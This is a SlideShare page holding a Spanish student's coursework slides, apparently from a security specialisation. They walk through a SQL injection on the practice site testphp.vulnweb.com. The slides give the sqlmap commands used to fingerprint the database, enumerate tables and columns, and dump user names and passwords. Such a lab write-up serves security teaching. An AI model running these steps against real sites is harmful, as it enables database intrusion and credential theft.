Especialización en 
Seguridad Informática 
• Ataque con inyección de 
código SQL a sitio web 
Estudiante: Daycith González...
Ataque con inyección de 
código SQL a sitio web 
1. Para la ejecución de sqlmap primero fue necesaria su instalación. El 
...
2. Seguidamente se 
descargó el paquete de 
sqlmap. Este se obtiene 
desde 
git://github.com/sqlmappro 
ject/sqlmap.git 
A...
3. Esperamos a que se 
descargue e instale todo el 
paquete, incluyendo python. 
Ataque con inyección de 
código SQL a sit...
Ataque con inyección de 
código SQL a sitio web 
4. Se realiza una navegación por el sitio para identificar puntos vulnera...
Ataque con inyección de 
código SQL a sitio web 
5. Seguidamente se procedió a identificar el sistema operativo y el motor...
Ataque con inyección de 
código SQL a sitio web 
6. Se obtiene la base de datos utilizada por el sitio, utilizando la line...
7. Una vez identificadas la base de datos, procedemos a extraer información, 
empezando por sus tablas: 
python sqlmap.py ...
Ataque con inyección de 
código SQL a sitio web 
8. Decidimos revisar la información de la tabla user, ejecutando la sigui...
Ataque con inyección de 
código SQL a sitio web 
9. Luego procedemos a extraer la información de las columnas name, uname ...
Ataque con inyección de 
código SQL a sitio web 
10. Con los datos extraídos fuimos capaces de navegar en el sitio, lo que...
Próxima SlideShare
Cargando en…5
×

Ataque con inyeccion de codigo sql a sitio web

384 visualizaciones

Publicado el

Este documento contiene proceso de inyección sql a sitio http://testphp.vulnweb.com, obteniendo información de servidor y motor de base de datos, base de datos, tablas, columnas, y registros.

Publicado en: Ingeniería
0 comentarios
1 recomendación
Estadísticas
Notas
  • Sé el primero en comentar

Sin descargas
Visualizaciones
Visualizaciones totales
384
En SlideShare
0
De insertados
0
Número de insertados
3
Acciones
Compartido
0
Descargas
12
Comentarios
0
Recomendaciones
1
Insertados 0
No insertados

No hay notas en la diapositiva.

Ataque con inyeccion de codigo sql a sitio web

  1. 1. Especialización en Seguridad Informática • Ataque con inyección de código SQL a sitio web Estudiante: Daycith González Rodriguez Corozal, Septiembre de 2014
  2. 2. Ataque con inyección de código SQL a sitio web 1. Para la ejecución de sqlmap primero fue necesaria su instalación. El proceso se realizó en sistema operativo Linux Server 14 LS, como se muestra a continuación: 1. Se instaló git, el cual es un software de control de versiones. Esta herramienta es necesaria para descargar el proyecto sqlmap.
  3. 3. 2. Seguidamente se descargó el paquete de sqlmap. Este se obtiene desde git://github.com/sqlmappro ject/sqlmap.git Ataque con inyección de código SQL a sitio web
  4. 4. 3. Esperamos a que se descargue e instale todo el paquete, incluyendo python. Ataque con inyección de código SQL a sitio web
  5. 5. Ataque con inyección de código SQL a sitio web 4. Se realiza una navegación por el sitio para identificar puntos vulnerables. En la url del navegador se introdujo el signo % antes del valor de la variable cat: http://testphp.vulnweb.com/listproducts.php?cat=%1
  6. 6. Ataque con inyección de código SQL a sitio web 5. Seguidamente se procedió a identificar el sistema operativo y el motor de base de datos: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -b
  7. 7. Ataque con inyección de código SQL a sitio web 6. Se obtiene la base de datos utilizada por el sitio, utilizando la linea: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db
  8. 8. 7. Una vez identificadas la base de datos, procedemos a extraer información, empezando por sus tablas: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -- tables Ataque con inyección de código SQL a sitio web
  9. 9. Ataque con inyección de código SQL a sitio web 8. Decidimos revisar la información de la tabla user, ejecutando la siguiente línea para conocer sus columnas: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
  10. 10. Ataque con inyección de código SQL a sitio web 9. Luego procedemos a extraer la información de las columnas name, uname y pass; contando con la suerte de poder ver el valor de la contraseña en claro: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C name,uname,pass --dump
  11. 11. Ataque con inyección de código SQL a sitio web 10. Con los datos extraídos fuimos capaces de navegar en el sitio, lo que nos permitiría hacer estragos en la aplicación:

×